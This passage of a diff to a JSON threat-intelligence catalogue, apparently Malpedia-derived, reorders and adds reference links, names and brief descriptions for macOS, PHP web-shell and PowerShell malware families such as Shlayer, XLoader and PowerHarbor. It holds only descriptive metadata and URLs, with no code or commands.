"https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468", - "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html" + "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] @@ -9499,8 +9921,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://news.drweb.com/show/?i=1750&lng=en&c=14" + "https://news.drweb.com/show/?i=1750&lng=en&c=14", + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [], "type": [] @@ -9513,9 +9935,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.orat", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt", "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", "https://www.sentinelone.com/blog/from-the-front-lines-unsigned-macos-orat-malware-gambles-for-the-win/", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt", "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf" ], "synonyms": [], @@ -9554,7 +9976,7 @@ "value": "Patcher" }, { - "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", @@ -9571,10 +9993,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", - "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", - "https://forensicitguy.github.io/analyzing-pirrit-adware-installer/", - "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf", + "https://forensicitguy.github.io/analyzing-pirrit-adware-installer/", + "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [], @@ -9588,8 +10010,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.poolrat", + "https://www.3cx.com/blog/news/mandiant-security-update2/", "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise", - "https://www.3cx.com/blog/news/mandiant-security-update2/" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment" ], "synonyms": [], "type": [] @@ -9602,15 +10025,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", - "https://objective-see.com/blog/blog_0x1F.html", - "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", - "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", - "https://securelist.com/calisto-trojan-for-macos/86543/", "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", - "https://objective-see.com/blog/blog_0x1D.html", - "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf", + "https://securelist.com/calisto-trojan-for-macos/86543/", + "https://objective-see.com/blog/blog_0x1F.html", + "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", + "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", + "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", - "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/" + "https://objective-see.com/blog/blog_0x1D.html", + "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" ], "synonyms": [ "Calisto" @@ -9638,10 +10061,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", - "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", - "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga" + "https://www.govcert.admin.ch/blog/33/the-retefe-saga", + "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", + "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe" ], "synonyms": [ "Retefe" @@ -9656,29 +10079,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.rustbucket", + "https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/", + "https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket", + "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html", "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/" ], "synonyms": [], "type": [] }, "uuid": "03f356e6-296f-4195-bed0-9719a84887db", - "value": "RustBucket" + "value": "RustBucket (OS X)" }, { - "description": "", + "description": "According to PCrisk, Shlayer is a trojan-type virus designed to proliferate various adware and other unwanted applications, and promote fake search engines. It is typically disguised as a Adobe Flash Player installer and various software cracking tools.\r\n\r\nIn most cases, users encounter this virus when visiting dubious Torrent websites that are full of intrusive advertisements and deceptive downloads.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer", - "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508", - "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://objective-see.com/blog/blog_0x64.html", - "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/", "https://securelist.com/shlayer-for-macos/95724/", + "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/", + "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/", + "https://objective-see.com/blog/blog_0x64.html", + "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508", + "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/" + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf" ], "synonyms": [], "type": [] @@ -9687,7 +10113,7 @@ "value": "Shlayer" }, { - "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.", + "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple\u2019s new M1 chips but has been distributed without payload so far.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow", @@ -9722,8 +10148,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf", - "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en", - "https://securelist.com/windealer-dealing-on-the-side/105946/" + "https://securelist.com/windealer-dealing-on-the-side/105946/", + "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" ], "synonyms": [ "Demsty", @@ -9753,7 +10179,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001", "https://objective-see.com/blog/blog_0x51.html", - "https://securelist.com/operation-applejeus-sequel/95596/" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", + "https://securelist.com/operation-applejeus-sequel/95596/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment" ], "synonyms": [], "type": [] @@ -9766,10 +10194,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.update_agent", + "https://twitter.com/sysopfb/status/1532442456343691273", "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", - "https://www.jamf.com/blog/updateagent-adapts-again/", "https://www.esentire.com/blog/updateagent-macos-malware", - "https://twitter.com/sysopfb/status/1532442456343691273" + "https://www.jamf.com/blog/updateagent-adapts-again/" ], "synonyms": [], "type": [] @@ -9782,8 +10210,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", - "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", - "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" + "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/", + "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/" ], "synonyms": [], "type": [] @@ -9797,8 +10225,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram", "https://twitter.com/ConfiantIntel/status/1351559054565535745", - "https://twitter.com/MsftSecIntel/status/1451279679059488773", - "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/" + "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/", + "https://twitter.com/MsftSecIntel/status/1451279679059488773" ], "synonyms": [ "WizardUpdate" @@ -9813,8 +10241,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.watchcat", - "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", - "https://objective-see.com/blog/blog_0x5F.html" + "https://objective-see.com/blog/blog_0x5F.html", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" ], "synonyms": [], "type": [] @@ -9829,10 +10257,10 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", "https://objective-see.com/blog/blog_0x3B.html", - "https://objective-see.com/blog/blog_0x3D.html", - "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf", - "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf", + "https://objective-see.com/blog/blog_0x3D.html", + "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/" ], "synonyms": [], @@ -9859,8 +10287,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf", - "https://objective-see.com/blog/blog_0x16.html" + "https://objective-see.com/blog/blog_0x16.html", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] @@ -9873,9 +10301,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", - "https://news.drweb.com/show/?i=2679&lng=en&c=14", + "https://objective-see.com/blog/blog_0x43.html", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://objective-see.com/blog/blog_0x43.html" + "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] @@ -9889,8 +10317,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", "https://twitter.com/PhysicalDrive0/status/845009226388918273", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], @@ -9904,13 +10332,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities", - "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html", + "https://objective-see.com/blog/blog_0x5F.html", "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html", "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", + "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities", "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/", - "https://objective-see.com/blog/blog_0x5F.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/" ], "synonyms": [], @@ -9924,17 +10352,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader", + "https://twitter.com/krabsonsecurity/status/1319463908952969216", + "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/", + "https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", "https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/", - "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption", + "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/", + "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", "https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/", "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/", - "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/", "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/", - "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", - "https://twitter.com/krabsonsecurity/status/1319463908952969216", + "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption", "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/" ], "synonyms": [ @@ -10008,9 +10437,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak", - "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx" + "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx", + "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" ], "synonyms": [], "type": [] @@ -10023,9 +10452,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.aspxspy", - "https://attack.mitre.org/groups/G0096", "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells", - "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/" + "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/", + "https://attack.mitre.org/groups/G0096" ], "synonyms": [], "type": [] @@ -10038,9 +10467,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.behinder", + "https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/", "https://blog.gigamon.com/2022/09/28/investigating-web-shells/", - "https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md", - "https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/" + "https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md" ], "synonyms": [], "type": [] @@ -10068,10 +10497,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode", - "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf", - "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a" + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a", + "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf" ], "synonyms": [], "type": [] @@ -10094,6 +10523,22 @@ "uuid": "dfd8deac-ce86-4a22-b462-041c19d62506", "value": "Ensikology" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.p0wnyshell", + "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/" + ], + "synonyms": [ + "Ponyshell", + "Pownyshell" + ], + "type": [] + }, + "uuid": "a6d13ffe-1b1a-46fe-afd9-989e8dec3773", + "value": "p0wnyshell" + }, { "description": "In combination with Parrot TDS the usage of a classical web shell was observed by DECODED Avast.io.", "meta": { @@ -10112,11 +10557,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", - "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", - "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html", - "https://securelist.com/apt-trends-report-q1-2021/101967/" + "https://securelist.com/apt-trends-report-q1-2021/101967/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", + "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], "type": [] @@ -10198,19 +10643,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", - "https://ironnet.com/blog/chirp-of-the-poisonfrog/", - "https://www.netscout.com/blog/asert/tunneling-under-sands", - "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/", - "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933", + "https://ironnet.com/blog/chirp-of-the-poisonfrog/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.netscout.com/blog/asert/tunneling-under-sands", "https://nsfocusglobal.com/apt34-event-analysis-report/", - "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/" + "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" ], "synonyms": [ "Glimpse", @@ -10240,11 +10685,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower", - "https://vblocalhost.com/uploads/VB2020-46.pdf", - "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf", - "https://www.youtube.com/watch?v=rfzmHjZX70s", "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf", + "https://vblocalhost.com/uploads/VB2020-46.pdf" ], "synonyms": [ "BoBoStealer" @@ -10272,13 +10717,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode", - "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities", - "https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/", + "https://www.certego.net/en/news/malware-tales-ftcode/", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md", - "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm", "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/", "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", - "https://www.certego.net/en/news/malware-tales-ftcode/" + "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities", + "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm", + "https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/" ], "synonyms": [], "type": [] @@ -10307,9 +10752,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader", "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html", - "https://blog.threatstop.com/upgraded-jasperloader-infecting-machines", + "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html", "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", - "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html" + "https://blog.threatstop.com/upgraded-jasperloader-infecting-machines" ], "synonyms": [], "type": [] @@ -10335,8 +10780,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot", - "https://twitter.com/VK_Intel/status/1329511151202349057", - "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/" + "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", + "https://twitter.com/VK_Intel/status/1329511151202349057" ], "synonyms": [], "type": [] @@ -10349,11 +10794,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://github.com/mhaskar/Octopus", - "https://isc.sans.edu/diary/26918", + "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf", "https://isc.sans.edu/diary/rss/28628", - "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf" + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://isc.sans.edu/diary/26918", + "https://github.com/mhaskar/Octopus" ], "synonyms": [], "type": [] @@ -10366,8 +10811,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig", - "https://twitter.com/MJDutch/status/1074820959784321026?s=19", "https://threatpost.com/oilrig-apt-unique-backdoor/157646/", + "https://twitter.com/MJDutch/status/1074820959784321026?s=19", "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html" ], "synonyms": [], @@ -10376,6 +10821,19 @@ "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3", "value": "OilRig" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.phonyc2", + "https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c630e510-a0ad-405a-9aeb-9d8057b6a868", + "value": "PhonyC2" + }, { "description": "", "meta": { @@ -10404,6 +10862,19 @@ "uuid": "7b334343-0045-4d65-b28a-ebf912c7aafc", "value": "PowerBrace" }, + { + "description": "PowerHarbor is a modular PowerShell-based malware that consists of various modules. The primary module maintains constant communication with the C2 server, executing and deleting additional modules received from it. Currently, the communication with the C2 server is encrypted using RSA encryption and hardcoded key data. Moreover, the main module incorporates virtual machine (VM) detection capabilities. The StealData module employs the Invoke-Stealer function as its core, enabling the theft of system information, browser-stored credentials, cryptocurrency wallet details, and credentials for various applications like Telegram, FileZilla, and WinSCP.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerharbor", + "https://insight-jp.nttsecurity.com/post/102ignh/steelcloverpowerharbor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "73b40a4c-9163-4a07-bf1b-e4a4344ac63a", + "value": "PowerHarbor" + }, { "description": "", "meta": { @@ -10423,8 +10894,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] @@ -10476,14 +10947,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower", - "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability", - "https://attack.mitre.org/groups/G0100", + "https://attack.mitre.org/groups/G0100/", "https://unit42.paloaltonetworks.com/atoms/clean-ursa/", "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/", - 